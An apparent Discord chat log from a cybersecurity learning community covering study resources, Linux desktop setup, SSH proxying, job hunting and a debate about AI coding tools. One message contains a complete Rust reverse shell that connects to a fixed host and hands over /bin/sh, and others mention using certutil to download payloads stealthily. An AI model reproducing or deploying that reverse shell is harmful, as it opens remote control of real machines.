#general
sudo hacker spotted
Hi I'm trying to fuzz iot protocols for getting into security research. I don't have any experience in security research but know my way around networks and security (seedlabs, exploitedu). I don't know how to fuzz protocols to find vulnerability, how do I approach this as a research topic? My approach was just read papers but that isn't getting me anywhere. Also what are the prospects in fuzzing research like what can I research by fuzzing iot protocols, what are possible research areas, what is the chance of me finding a vulnerability using fuzzing approach and what can I infer as research worthy conclusions
Good night dude
~$ exit
I see bell peppers in chat
What is that face
That is the face of a creature that has never experienced genuine joy
a sandwich with sudo privileges
I've been lacking on THM as of late ngl
its ok,
Great job, seems like you're on a streak today
Waiting on bro to finish that thought
Ah you're returned.
Sloboda is The Returned
yep
Can you please DM Jabba?
If he hasn't reached out to you.
7 hearts, damn i am popular around here
I missed the whole context of why you left, just that you had.
Particularly caustic chatters, tldr
Is this for school/college/uni?
Ssean was banned.
well tldr is i cant handle amount of brainrot this chat can produce sometimes and all trolls being left with slap on the wrist
thats basically it
I must have not been here in a while
man just needs to chill sometimes
It comes and it goes depending on time of day and who all is around lol
Ah, that would be why Jabba would like you to reach out.
i neither want or can to stay in unproductive place where there is drama 90% of the time
But yeah I'm here for the actual intelligent discussions which I'm quite happy to have here
me too
thats why i didnt want to perma leave
i met some great people here
Yeah. I've also met some right roasters.
I think that's a consensus a lot of the chat has reached. When THM chat is nice it's nice, but it has high highs and looooooow lows

Oops, that's my Scottish showing.
just had some nice pulled pork, also a good roast
Being annoying should be a bannable offense
I personally think gif spam is annoying as heck, but we still want Berry around
no, being dick should be
Not sure about bannable. Maybe the guidelines on muting should be broadened a little bit to include some of the blatant cases, but that's not for me to decide
That's low key a rule in most communities, although phrased a bit more tactfully lol
Just allow people to be.
man this website is paid :(
not enforced enough in my opinion
The problem is this is an educational environment.
Some people do not understand what behaviour is appropriate
It's not fully paid.
Nah laissez-faire moderation doesn't work lol
The majority of the content is free.
Avoid the learning paths, go via the other content
i know but i cant continue in some lessons because some of the rooms are paid
oh okay
i understand wording is different but i just am not able to find any nicer words that can better express how i feel about certain types of people
You can filter in the search for just free rooms and more, the room search is very powerful
thank you
but I will say, imho a sub is worth it, if it is viable for you to do so
i dont have money im a minor
I got into THM to brush up on infosec after landing a position and it's been invaluable teaching me many topics and tools I use daily at work
totally fair
i sometimes log on THM to learn some stuff, school takes a lot of my free time
so getting a sub isnt worth it if i cant log on that often
mhmm, still hundreds and hundreds of free rooms off the beaten path
I'd say a majority of THM's content in total isn't actually listed in current learning paths anymore for one reason or another
There's also hundreds of free resources outside of thm to learn on too
You could honestly probably learn cybersecurity without paying a dime
paths are paid, but most of the ctf rooms are free
really? like what?
HackTricks Book site is fantastic
shout out to pwn college
Portswigger academy is a good place to learn web pentesting
Probably one of the best.
Hacker recipes too
Been a god send for AD ctfs
Especially hacktricks
Hacktricks, lolbas and gtfobins are probably my most 3 visited sites for resources
Ive been slowly reading on gtfo
wow
PayloadsAllTheThings is a great cheatsheet as well: https://swisskyrepo.github.io/PayloadsAllTheThings/
whats with the binaries?
revshell is nice too
Wdym what is it with the binaries?
Gotta lock in today and complete 20 rooms so I can get to 0xD
like what are those?
lolbas and gtfobins are for exploiting common system software for evasion and more
Programs basically
lolbas are for Windows and gtfobins are for Linux
No worries, that's what THM is here for!
They're great for living off the land too.
mhmm
I always read gtfobins as a swear
You're significantly more stealthy if you use built in system software for exploits and etc
you got this
hm, well i cant wait to understand all of this stuff, it sounds really interesting
good luck
a simple but fun example, Windows certutil can be used to base64 encode/decode and download your payload in a sneaky way
Despite being designed just to handle certificate management on Windows Server
i dont want to be mean youre really helpful but i dont know what youre talking about this is too advanced for me
You'll get there
No worries, THM even has rooms on this and similar
you will understand in no time no worries
logs that connect to shells are very obvious if not encoded to blue team people
but yeah lolbas shows you how common built in software can be abused like this
as referenced above, it's called "Living off the Land" since you're just using the software that's already on your target machine
^ This could be helpful in an AD setup
Just you wait, if you keep at this long enough and Microsoft defender starts detecting your own Markdown note files for the reverse shells and other common exploits, then you're doing it right lol
Speaking of AD but thinking from defender/blue team perspective, PingCastle and PurpleKnight are fantastic software packages for auditing your AD security. Also used for offensive purposes in real threat actor campaigns, despite how noisy they are

Actually thinking of that, I need to run PingCastle on our new client's AD infra to see how that stacks up on Monday
good luck
I've seen some horrors uncovered in the past like service account tied Domain Administrator back in Server 2003 which would have allowed for easy escalation had I not wiped that connection out
I need to read more about active directory stuff as i did the module but was still super confused
I can't remember what the word for that is, just bringing that up off the top of my head
spotted the iOS user c:
Thanks for asking good, how about you?
Gave +1 Rep to @fiery imp (current: #606 - 9)
I'm good mate
@sick lance please see above
Glad to hear that
Done!
Danke!
Thanks
Gave +1 Rep to @sinful moon (current: #34 - 280)
Just did this room on thm
https://tryhackme.com/room/dailybugle
When one appears, I'm expecting more.
Old but gold.
Yet again a reminder that if you don't feel like removing the embed after the fact, you can encapsulate links with < > to remove the embed
Yeah
ohh..my bad. I'll do that
Would be cool if THM embeds actually showed room info tho
Yeah no worries, I'm just being anal since it takes up so much room lol
Ty for letting me know!
Gave +1 Rep to @sinful moon (current: #34 - 281)
btw i tried the ssh proxy you mentioned when you talked about your arch box
Anyways back to my point, I do hate how iOS keyboard doesn't actually use the true ` backtick in its keyboard in an effort to be typographically correct
Although laughs on iPad with logitech physical keyboard where I can do proper nmap style backticks all day long
Although that brings me around to my next complaint, it's been years now Discord, when will mobile get code block syntax highlighting?
It's especially silly on iPads where this looks like the full desktop interface for Discord, but still can't do some niche Desktop features like that due to a completely different software stack
you can see this with pretty formatting on Desktop, and I can create this via mobile, but I can't see the syntax highlighted result lol
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn main() {
    let s = TcpStream::connect("10.0.0.1:4242").unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}
for all the mobile users
lol thank you, like I even set it up to do that but I couldn't see the pretty results without another machine
(Just a Rust reverse shell since I still had PayloadsAllTheThings open from earlier)
Ouch using unsafe on Rust but it's understandable in this case
Oh yeah, how did that work out? Probably just fine I'd gather
My mobile device is clearly superior
nice sideloading bro lol
lmao I'm not
what did they actually add it to react on Android only?
I think it's iOs that doesn't do code blocks as pretty as Android
For years and years Android couldn't either
so that must have changed in the two years since I switched
Trust me if I were to be side-loading it I wouldn't post it publicly on here
I remember telling you this
worked out surprisingly well ngl, workflow got a lot more easier ngl
Yeah I just use aliases to automate it and call it a day, it's lovely
since i dont have to switch from vm to host every 10 minutes
mhmm
my VM doesn't even have a graphical display so it's invaluable to ssh tunnel either web traffic or RDP traffic locally
kvm vms are pretty seamless but its lot nicer when i can just use terminal on host with tmux
mhmm, I do love me some qemu/kvm, with Proxmox being my current home lab virtualization host
mhmm, I typically do this on my side work from home Mac Mini and it just werks once Burp and Microsoft RDP is setup
I wish Remenemia RDP client or however you spell it was available on Mac though
so freaking good on Linux
although i am a bit sad because caido has some issues with remote dns
"Remenemia"
lol an attempt was made
It's such a stupid word for a tool.
I don't know how many times I give two n and two m's
i couldnt find proxy option in remmina due to skill issues
I ended up just creating an alias
but i found xfreerdp has proxy option
It's the same way as you're doing now, once you set up the ssh tunnel for RDP traffic, just tell it to target 127.0.0.1:13389 or whatever
i just do this
you don't need that feature built in, I literally just use the Microsoft RDP client on macOS to do this
I also stuck it in the panel
i run headless as of right now
my third line there
you have to edit the 11.11.11.11 with your target IP each time
with 10.10.10.10 being your attack machine/VM
xfreerdp /v:10.129.201.55 /u:htb-student /p:HTB_@cademy_stdnt! /proxy:socks5://127.0.0.1:9050 /f
i just do this for now
works fine
mhmm that is for sure another way to do it, but this works with all RDP solutions under the sun
and as for proxy i do this
alias kaliprox="ssh -i ~/.ssh/kali -D 9050 -q -C -N styx@kali -f"
Oh I'm sure you can but laughs at Mountain Lion era and basic GTK2 UI there

Your words, not mine.
mhmm lol
But yeah I will say macOS makes for a fantastic *nix and infosec companion in my work from home setup. I have it on our personal network instead of the work network so I can verify firewall rules and more in a completely unconstrained/not allow listed environment
Although lol 95% of that is just sshing into my real Linux pentesting server anyways
also one big thing that this helped me with is being able to reduce amount of resources that i need for vm
but yeah I set up a similar Virtual Private Server at work for OpenVAS vuln scanning of our clients which isn't allow listed at all
mhmm headless Linux VMs and servers are just love
I do hope you're using our lord and savior tmux when you're working on these
but i still gave it 8 cores
lolol
of course
cant live without tmux
Yeah I over provisioned my first VPS for pentesting, I think 4 cores and 2GB of RAM or so, but still love it
8 cores just for the memes and 4GB of ram
since i decided mid installation i will do headless
actually I can check via my last screenshot of it
Yeah I was correct there
my tmux setup at the bottom there
How do you get this terminal frame thingy, by the way?
mine is default with just changed color
I see these screenshots all the time and I always wonder how to.
frame thing? That is just tmux?
thats mac i think
Including the window menu with the buttons at the top?
Ah, fair.
Oh if you mean the alpha transparency in the png that's just via built in Screenshot utility in macOS
Prolly just a window screenshot then.
mhmm
is tmux status transparent or black
iirc I set it to black or none. I ported my classic .screenrc theme by hand
Man, I fully committed my Desktop to Arch today, and while everything works as intended, I am missing UTF-8 icons again, arghghgh.
noto-font and noto-fonts-emoji, optionally noto-fonts-cjk if you run into eastern languages tons
Then just use noto-fonts as system UI and call it a day tbh
only issue i have with it is this
Already got all of nerd-fonts installed, want to go for font-awesome as well. That should cover everything.
when terminal sometimes goes whack
But do I install ttf-font-awesome or otf-font-awesome?
and status doesnt sit perfectly at the bottom
ttf is fine, otf vs ttf is kind of up to you
TTF is more well supported by all OSes, OTF is more open but limited support
Yea, reading up on the difference right now.
for Linux it more or less doesn't matter
OTF it is.
mhmm totally fair
If it breaks Imma just swap it.
Thanks for the input tho. ^_^
Gave +1 Rep to @sinful moon (current: #34 - 282)
but do install something that covers most of UTF-8 and best candidate for that is Google Noto fonts
mhmm np!
whew
I do think I already got you beat on that. 
Dunno how large the nerd font collection is, but I just installed the entire package group.
Even when I'm in my graphic design obsessions (nearly went into it) I never had that many fonts
Also Fira Code, best coding font.
But yes typography and the theory, design, and tech behind it are things I'm a huge nerd for
I use Hack which is very similar to Fira Code
But yeah I prefer Hack due to some changes and more vs Fira Code
that's barely scratching the surface even in Arch
But does that do the cool thing where it turns -> into a single character arrow and != into a crossed out =?
we call those programming ligatures
This is why I like Fira Code.
I started Linux it's not so difficult right?
I personally don't like them because they are less clear than the literal characters
Naa, you'll be perfectly fine.
Just be prepared to learn as you would with any new OS, and best way to learn is just using it
Fair, I suppose, different taste. The great thing is that nobody who does not also use a font like that will see the recoded characters.
i like tall letters
when you have a question, just google it, there's thousands of results for any question you will have
I see it has the same features.
idk how to describe it
Perfect
Can you gimme a screenshot?
all nerdfonts do
Ask a lot of questions.
I used to swear by the bitmap font Profont which is just lovely, but with resolutions increasing and UTF-8 getting more important I finally made the switch to TTF about a decade ago
its not tall but idk how to describe it
so so so much has changed even just in the 18 years of Linux use I've had alone
I started out with sys v init and HAL, urxvt, screen, archfetch.sh, kernel 2.6.26, ALSA instead of Pulse or PipeWire, etc etc
vim instead of neovim, a lot of these I had to be convinced "fine, it's finally time for me to change" other upgrades I was excited about
That's why I asked you to show it. 
PipeWire I adopted as soon as it was made standard in Fedora, frick PulseAudio
kernel 2.6
That's fine, IoT stuff still uses that lol
Pulseaudio works for me, I suppose.
Literally no reason not to use PipeWire since it's a drop in replacement
More familiar with its CLI controls.
just with lower latency and better fundamentals
PipeWire 
Argh, ok, sure, I'll look at it.
Nice, yeah I highly recommend it
Plus it's how Wayland screen recording permissions work and more
yes there's similar terminal UIs as before
or yes just raw things you can use for keybinds
Not looking for TUIs.
you can even use the same pulse commands probably and it will respond, I'd wager at least
Hmm, doubtful.
you can use Pulse UIs with PipeWire without the app knowing the difference
pactl seems like a very PulseAudio specific thingamajig. xD
Wait, you can?
Wild.
I see, I see.
# audio controls
binde = ,XF86AudioLowerVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ -1000
binde = ,XF86AudioRaiseVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ +1000
bind = ,XF86AudioMute,exec, pactl set-sink-mute @DEFAULT_SINK@ toggle
bind = ,XF86AudioMicMute,exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle
this works for me
Well, that is awfully convenient.
as long as it's all client side Pulse stuff, it works with pipewire
Ah cool, I got more or less the same setup.
One moment, Imma just swap it out and see whether everything still works.
lol inb4 everything breaks, but it historically hasn't for me
just make sure to follow Arch Wiki PipeWire guide when doing so
Guess I'm not disabling it?
that's a common issue due to the symlinks iirc
Well, there is, but according to everyone around me, there is a better way to have sound. xD
@Bit
# Fn keys
bind = , XF86MonBrightnessUp, exec, brightnessctl -q s +5% # Increase brightness by 5%
bind = , XF86MonBrightnessDown, exec, brightnessctl -q s 5%- # Reduce brightness by 5%
bind = , XF86AudioRaiseVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ +5% # Increase volume by 5%
bind = , XF86AudioLowerVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ -5% # Reduce volume by 5%
bind = , XF86AudioMute, exec, wpctl set-mute @DEFAULT_AUDIO_SINK@ toggle # Toggle mute
bind = , XF86AudioPlay, exec, playerctl play-pause # Audio play pause
bind = , XF86AudioPause, exec, playerctl pause # Audio pause
bind = , XF86AudioNext, exec, playerctl next # Audio next
bind = , XF86AudioPrev, exec, playerctl previous # Audio previous
bind = , XF86AudioMicMute, exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle # Toggle microphone
bind = , XF86Calculator, exec, ~/.config/ml4w/settings/calculator.sh # Open calculator
bind = , XF86Lock, exec, hyprlock # Open screenlock
bind = , XF86Tools, exec, alacritty --class dotfiles-floating -e ~/.config/ml4w/apps/ML4W_Dotfiles_Settings-x86_64.AppImage # Open ML4W Dotfiles Settings app
bind = , code:238, exec, brightnessctl -d smc::kbd_backlight s 5+
bind = , code:237, exec, brightnessctl -d smc::kbd_backlight s 5-
lol pipewire probably got pulled for something else as a dep
Thanks to you as well, my current set of keybinds already works.
Gave +1 Rep to @loud marlin (current: #25 - 389)
^_^
Meanwhile I've gotten less cool and just configure my keybinds in my DE
Still sort of want to disable the pulseaudio daemon to see what happens.
just lol do consult the wiki to prevent breakage as I mentioned
But I cannot because I don't know its damn name, whahaha.
they should have info for dealing with existing Pulse
Wiki is a good call.
Thanks guys
Gave +1 Rep to @rugged kayak (current: #213 - 36)
Sorry i was eating
if you disable one. you need first to tell what of that two to use as default before disable one
Right, the daemon runs in userspace.
systemctl --user stop pulseaudio did the trick.
ay my rep was saved nice
yep there you go and that makes sense
lol thinking of my ancient Arch history lets see if I can find that screenshot
lol there we go, Openbox and Arch back in 2008
it's because it's on a 1600x1200 4:3 screen on a Dell laptop from 2002
which is a crazy high res for the era
even in 2008 tbh
hi elizabeth
heya!
how ya doing
Pretty well, enjoying a lazy sunday chatting here and having rain white noise via iOS accessibility features
If anyone didn't know, this is built into iOS and macOS, and you can put a hearing accessibility option in control center for easy access:
cool i didnt know!
Yeah kinda killer hidden feature
Yep, literally drop in replacement, glad to hear it!
Just gotta add that to my ansible setup thingy now.... Urgh.
everything that references ALSA, PulseAudio or JACK APIs will now be interacting with PipeWire transparently instead
When I choose pipewire during archinstall, will it still ship with pactl?
good afternoon
Good afternoon.
I don't think so but you can install pactl on its own anyways I believe
Well....
Not really, maybe from the AUR?
I don't like the AUR.
Wonder what the corresponding tool for pipewire is, might as well fully commit at this point.
Yeah just read the wiki tbh
but psh not liking the AUR makes you slightly unhinged
I can understand it for this specific case but whew
That's like part of the whole appeal of Arch
I was an AUR maintainer for multiple packages for years
I think it's cool what sort of stuff you can install from there very easily, but I have trust issues regarding the security of the packages. xD
Ok, wiki also says pactl. Guess they are not replacing that part of the setup.
that's why you always read the PKGBUILDs which solutions like yay/paru force you to
mhmm that's my current solution. I'm loosely an acquaintance with the dev
This is taking longer than I expected
I will be honest though, I've used so many AUR helpers over the years as times change I just have an alias for update lol
I do that as well.
search and pinstall (had to, because install is a command already), and update and so on. xD
Congrats! You can force the update to happen on Discord by re-registering your Discord to THM verification
Otherwise, just wait a day
you need 900 i need 6000 for next level 
Hey hacker pals uwu
I still need about 800 points
hello hello

How're we
Ah yeah I misread that
I am missing like 20k, it does not get any better.
The scariest jump is the next one, from 20 to 35
That will take a bit
Maybe someday the roles higher than 0xD will actually have their own colors
How has chat been the past few days?
Alive, wby ?
we are waiting for admins to invent new colors
Anyways, just got this cool looking new game, so I will be playing that now.
Thanks for your help. 
Same as it always has been lol
we are free from the ssean menace
no regrets there lol
Currently, they are all green. And also don't have access to the advanced channels.
I swap between rage and moroseness
it was great if you ask me
What happened?
idk i wasnt there
Wahoo
If you've seen their interactions it only takes a tiny bit of imagination to understand how lol
part of me wishes i could see what broke the camels back but i shouldnt be this drama addicted
I think I was there for day one where they instantly stood up for a nazi troll right after they joined, and couldn't actually defend their point beyond "free speech" lol. Discord is not free speech yo
Hello! Did you know that AI can analyze video like a human ex. basketball match and send information about it to user?
lol yea should have been banned first day
Many such cases š
Hellllloooooo chat!
are you a real person
I'd agree, but I can at least say that I can understand the moderators wanting to at least give them a chance
Any dropped wallets?
Hey, we should allow hate speech in a privately owned platform cuz uh ... My rights!
i carry everything on my purse
I don't have any money leave me alone
Awh man :(
free speech, doesn't mean free of consequences
Good thing those people aren't in a place of power in the US government
Yuh
Hey lieutenant Kim, how are you?
I have some uh, bad news tho, @fallen burrow
I know I know
couldnt sleep this night so im laying low for today
yupp just asking
As a detective I don't sleep
Wanna do ctfs?
Meanwhile poor Ensign Harry Kim never progressed in his role in seven years on a starship
I live off of Alani and boiling showers.
the long arm of the law š
Oh and vape juice.
Oh I do PI OSINT type stuff, I'm not a LEO
which room?
You got mail
If you're serious, that's really neat
U like osint?
Yuh. I help people find things.
It's not super glamorous and all above board.
It makes me feel like I'm big brain
lol one of the things the Noir in my name is for is for Film Noir so no complaints
i havent done anything on phishing though
Say potatoe.
I have a cool jacket for it too.
Wanna try my osint room then?
Can't be a PI without a badass trench coat and etc
"Say Potato, Elizabeth"
Neither have I!
Let's suffer together
@sinful moon
ok then
Sure I can try it when I get to studying TN or tomorrow
But rn i am making food
Nice nice!
sure i gotta finish the episode im watching too
My mom found it at a goodwill and I looked up the brand and its website is sketch lmao
0i, I said potatoe.
Potato Potato, same difference
I gotta run a self defense class for my fellow gays then make some dinner.
So I may try the osint room later
It's pronounced potato tho
Patatoh
I have really low motivation seeing that there are no job offers for juniors in cybersec of any kind be it pentest, SoC or Security Engineer. How can I motivate myself? Any ideas?
what got you into this field in the first place
SAY POTATOE
Kk, one sec
whew just got a flash back to the mid 00s Flash vibes: https://youtu.be/ihMMw0rnKz4
by etM http://www.albinoblacksheep.com/flash/taters
Potatoes. Boil 'em, mash 'em, stick 'em in a stew.
What we need is a few good taters.
Lord of the Rings remixed.
I was doing it in the job I was laid off from but it was only basic stuff like threat modelling, risk registry maintaining and sla maintaining
If that was question for me
yep i asked you, but i asked you this so you could reflect on yourself why you even started and find that spark that got you into this field in the first place
May want to try #cyber-and-careers though as this will probably get buried
Well I like cybersec but after 3 years of tedious paperwork I see that no one wants to hire me as I have zero experience so my motivation is hitting the ground right now. Second month and no job offers to apply for.
i dont want to discourage you but cyber is not entry level field, you need at least some experience in IT
Tried, it's basically dead
I would highly agree with that
I have some experience in IT
most SoC jobs require at least 1-2 years of experience, pentester is also mid-senior level position
Help Desk is often looked down on but it's highly valuable experience. Swift On Security constantly talks about how he started in Help Desk and how it informs and helps him in his infosec roles
Away back and make your tea in the microwave.
Cool but how can you gain experience if no one wants to hire you to gain such experience?
you know the drill
helpdesk mainly
Again you find those entry level jobs, but it sounds like you already have some experience under your belt
but either way it can help to just get your foot in the door
There are no entry level jobs there are only mid-senior as mentioned above
I very rapidly went from help desk to infosec and sysadmin after I proved myself at my current job
Smaller orgs can also help
This exactly
I'm at a very small org which kind of means you get to do it all, and looks amazing on your resume, but be careful not to bite off more than you can chew
Windows sysadmin, Linux sysadmin, infosec everything, compliance management, devops, etc, I kind of do it all
I have worked as software tester for 2 years, programmer for 2 years, devops for 1 year and pseudo cyber sec for 3 years. No one wants to hire me.
I am literally the SOC manager... but lol our SOC is outsourced anyways
I'm just the final stop for that
yea job hunting can take quite a while
Set your expectations lower and get your foot in the door before advancing up the ranks if possible. Two months is also a low timescale with how bad the market is right now
i just applied for devops internship, do you have any advice for me if i get the interview or a job even
I've been trying to get security engineer and SoC and nothing. I just started learning pentesting so I do not even try for such positions not to make a fool of myself,
Learn azure, aws, git if you can in your job.
mhmm
also docker and kubernetes
git i know well, i have some experience with docker and setting up linode instances
It is magical when boss is like "uh I need a single server serving three legacy web clients, can you do that", two days later I have a Docker Compose config just for that
try to automate as much as you can but test it out not to mess up and do not tell anyone you did automate your job
docker compose is goated
Use Copilot AI
i have script that installs my arch dotfiles
There are programs that already do the same thing, but fair enough
It's not a bad idea. I use ai a lot but doublecheck what it returns. It really helps to rapid prototype scripts
You can't hide from the future man @sinful moon

Future man required checking behind him to make sure his work is correct
like asking an intern to code something up for you
It's more about getting tasks done quicker, and spending less time on repetitive tasks
this ^
Not getting it to do work you don't understand how to do lol
ai makes easy tasks easier and hard tasks much more harder
Just god forbid if you don't notice a vulnerability that's being entered into the codebase over a simple "well I didn't actually code this myself"
dont use ai for coding or you will start to suffer from skill issues pretty fast
As an industry professional who doesn't rely on AI, you should easily be able to spot when AI makes a mistake
i tried copilot and i was getting work done a lot slower and it just started annoying me and getting in my way
people want to write code, not do code reviews of garbage that ai produced
Yeah while it can give you solution, I'd just re-code them yourself under more ideal circumstances
People can use AI just fine IF they understand the code that it returns and know what it does. For me asking AI to write to do something in python and then fixing issues if it does not work and sometimes optimizing it is easier than wasting 4 hours to search for libraries or scroll through documentations.
Why do you assume AI can only be used for generating code?
bro u started talking about copilot first
"what's wrong with my code" is a far way off from "code this for me"
i did not assume, its currently its most common use case
and i am speaking as developer therefore i will talk about ai and coding
But it also helps to understand what is wrong with the code too.
yes I was speaking in support of such
i say if you cant read code you have skill issues
but that is just me
try to feed ai with random java 50 lines exception it will explain it to you like you are five
Realistically we are just not there yet imho
it can be a helpful tool, but needs mountains of human oversight or things go wrong quick
Can also run afoul of open source licensed code and more it was trained on, sometimes used verbatim
Lmao what? Again, it's a tool, not a replacement. Idk about you but I'm all for a tool that can speed up both development and learning
asking ai to analyze you a piece of code is you avoiding learning
i really dont want to use it so i dont end up addicted
ai makes mistakes
Meanwhile I personally see it as a handicap where people are just accepting the results with a quick once over and committing
reading code is necessary skill
Not a reason not to use it. Not all sources on the internet are true
i am not speaking from internets sources i am speaking from my experience
That's true but typically people are being more skeptical about these posts than AI "magic"
for example i had to fix a feature on some golang framework with text wrapping
No it's not
i asked gpt and it gave me bullshit
^
i had to read the code to understand it
No I will disagree there, "whats wrong with my code" is a much better use of AI than "generate some code for me"
It's not all black and white guys
ai is simply a tool, doesnt mean its a good one
Some of the top fortune 500 companies are using AI to help their development teams analyse code
Yes Microsoft claims that 30% of their code is now AI generated and that's terrifying lol
Enron was fortune 500
Look what happened to them.
indeed lol
sloboda might've had a bad experience with ai, I can tell
imho no matter which way you stand, it's healthy to bring some skepticism and critical thinking into the mix
Hold on. Ai is thinking up a response for me
Yes Adobe Illustrator is quite neat lol
i mean look at the whole devin scam
I don't think you can blame AI for the downfall of a company lol
6 months old startup worth over 2 billion
Why not?
(you didn't capitalize the I, and traditionally Ai is adobe)
not yet maybe
I wasn't, funnily enough that was 2001 or so...
It's a point about Fortune 500.
you blame the greed c-suite for firing the working force
ai is cheaper than devs
if you fire dev over ai you deserve to fail
For example here https://www.perplexity.ai/search/explain-this-code-to-me-interf-tYfjBg3TQb6x8AlyNOzBvQ#0 AI can help someone to understand code by explaining what it does and how it does it.
Or you buy the team copilot licenses for the devs to support them and retain them as loyal employees
Difference is what you take from the output.
Honestly AI for uses like that are just a fancy search engine and should be treated as such
idk about yall but I don't like the word "AI"
With a copilot license?
mhmm, LLM is much more descriptive
yea like i said, grow addicted to it and wont be able to code without
damn that share button is broken again, fixed the link
If they use it effectively, they will save themselves time, have more of an impact, contribute to the company's success
yeah, that's the same reason i don't chat gpty
While LLM are helpful, it can also cheat yourself out of the critical thinking and problem solving required for a task
Yeah that is a concern, people are becoming reliant on AI too
Just like on THM, why cheat answers, you're cheating yourself out of the education
you cant effectively use chainsaw for job that requires a scalpel
this is what i am saying too
sometimes you need to chop down a tree before carving a toothpick
On the flip side, yes AI/LLM is helpful and can be a game changer to some, but you need to read it as if your dumb intern wrote it
I'm such a great poet
Me too
When it works.
I hate Google's integration of AI, if I listened to it, it would have killed me with electrical safety misinformation.
code analysis for example, i will just spit you out the answer you need
you didnt do any work
You can use -ai when googling to hide the AI response iirc
tell it to do otherwise
It's just a tool. Tools are made to make work easier. Would you say a farmer cheats because he uses a tractor instead of a plow?
yes
Literally this
That's not a great analogy at all
It's not great it's the greatest
i do sometimes use it to explain me what some code does though
That's like saying that if you're not using AI to "plow your fields" you're backwards and doing it wrong
not great, not terrible
I've lived through the crypto fad.
This too shall pass.
indeed, we all have
Both times, Nvidia selling the shovels...
surprised people haven't learned from NFT and crypto era
@wooden totem Our backups are safe, it isn't a dream. Immutable backups, backed up by Veeam
Or even better. People shouldn't use Visual Studio, IntelliJ or any kind of IDE because it is cheating. They should use notepad or vi to code. Automatic suggestions? lint? Cheating!
thats just a hype train, it happened millions of times throughout history
Oh god crypto
I will say that at least AI has some small tangible benefit in comparison to the above though
Don't bring that shit storm back 
but this is nothing new
look back at mid 80s episodes of The Computer Chronicles and it's AI this and AI that
Ai can be useful, where it's used in Hospitals and such.
Or anywhere
But it's been used there long before it was used for code.
yup totally, beep boop thingamabob works yes, excellent
AI sure didn't change the world in the 80s and it remains to be seen if it impacts things meaningfully now other than bad code
There's no doubt as to why millions of companies and individuals are adopting AI, and why it's already becoming integrated with some of the world's leading tech.
Because it's the latest fad.
hype is why
No it's not
AI addicts when they gotta think for themselves
helps their profit margin and stock market valuation
Hyprland workspace management is kinda cringe, not gonna lie.
Did Apple or Microsoft release a software update when NFTs were popular?
saying you use AI is the key to boost your market valuation in the stock market
No but game companies sure did
and fell flat on their face
lol
No because NFT's were shit
It's a $196 billion industry
just like the metaverse was
AI at least has the potential for something, but we're not there yet
every time someone copy and pastes code from ai without knowing what it does, an angel loses their wings
Except it did. Google R1 at Digital Equipment Corporation and XCON
Ai creates lazy students, who carry that out from beyond their studies.
Those were decision making applications and nothing like the AI we're familiar with today
If you know how market caps are actually calculated, you would know that this is a lot of hot air.
it was considered AI at that times and they were created while working on AI
Seems to be a lot of bias towards AI preventing learning and cheating. AI also helps to save lives, prevent fraud, so many good things that aren't being mentioned here
well that is true, AI has helped the medical field a lot
iirc the term was "expert systems" in the 80s because they were supposed to help you make decisions as if you had an AI expert on the team
its just as a student I see the laziness up front in my daily life
But realistically they were all pre-fed answers in a matrix of if;then;else statements
would a lab-created brain be counted as AI?
Ai used to detect brain anomalies is more useful than teaching somebody how to code, or write a report.
Can you elaborate?
Assuming you're just fine tuning it, yes
And a significantly better use of tech that's actually all about pattern recognition
lab grown brain, it thinks like a living thing, it's made of biological material and it has intelligence
Even still, these are used in a consensus process. It's not making decisions
Apparently AI cannot manage your security
Just like our own intelligence. Humans thousands years ago: Me monke me want eat and sleep. Humans now I do not need to explain do I?
More of an aid.
That is extremely reductive
But that is how it works
You have no idea how complex our brains were even then
something need to be primitive and bad to be slowly improved and get better. Nothing is created good or perfect in the first place
For example, think for a moment why humans can see more shades of green than any other color
evolution and specialization
we were adapted to see predators in the foliage from a primal level
Colours don't exist, they are just a perception of the brain
and even that task alone is something AI dramatically struggles with, despite advances in AI image recognition
Non-sequitur…
If we can't even simulate something we do without thinking in early human evolution, we are nowhere close to this sorta thing
Different wave lengths exists. Color being a representation of said wavelengths. It still exists. But sure the words we attribute to colors are purely arbitrary
That is because we are stupid and cannot make it learn better. But there was that experiment some time ago I forgot how it was called. To make it short scientists created AI with primary objective of communicating and learning. At first they were able to see how it communicated with each other but later it got so good at it that the speed of communication was better than any human made algorithm. The only issue was that scientists were no longer able to see what data was sent and received because for humans it was gibberish trash. They got scared and axed the project just in case.
Created by the brain though
The brain isn't creating anything unless you are meaning hallucinations
you could also say that colours were always there waiting to be seen
and lots of other colours exist that we cant see
Not sure what point you're trying to make it here tbh
Physical properties of light aren't colour
No, the color representation happens due to the rod and cones in our eyes (which are processed upside down I'll remind you, and our brain flip that right side up and interprets the color signals we received from the eye)
Think they're just arguing for the sake of it at this point.
wut is all I have to say
wait how did the topic go to this
I don't know lmao
true but it is not color this are wavelengths that are translated by brain to colors. There is no color per se.
imho it's always best to have a healthy skepticism about any new tech and to adopt it unquestionably is a mistake
I like debating about topics, I guess it's a way of learning
So, no color, but how is this relevant to the ai discussion? Did I miss something or was it always about the arbitrary representation of color
i just really want AI to fail so we dont all run out of jobs lol
It's quite an old experiment where they had two AIs communicate with the task of optimizing language.
And, well, the AI optimized the language to a point where nobody was able to understand it anymore.
Skepticism also doesn't mean "ignore facts you disagree with" it is how the scientific method works
But that was a couple years ago, lel.
But isn't AI creating jobs?
I want it to succeed but at the same time not to lose job. AI is our only hope for survival.
Oh I am familiar with that but lol, I couldn't be bothered to read the paragraph tbh
Fair.
i liked ai discussion
Net positive or net negative
you sure the higher ups wont just leave 99% of the population to die when they get AGI?
no need for a work force when AI can do everything
AI will hopefully advance scientific studies, and either allow me to visit the moon or buy a flying car
thats called a helicopter
This argument goes back to the 1920s and earlier with automation, no we need staff to oversee the machines
They won't. Higher ups are stupid people with power. They need normal people like us to figure out stuff.
A helicopter to the moon? Or a flying helicopter car?
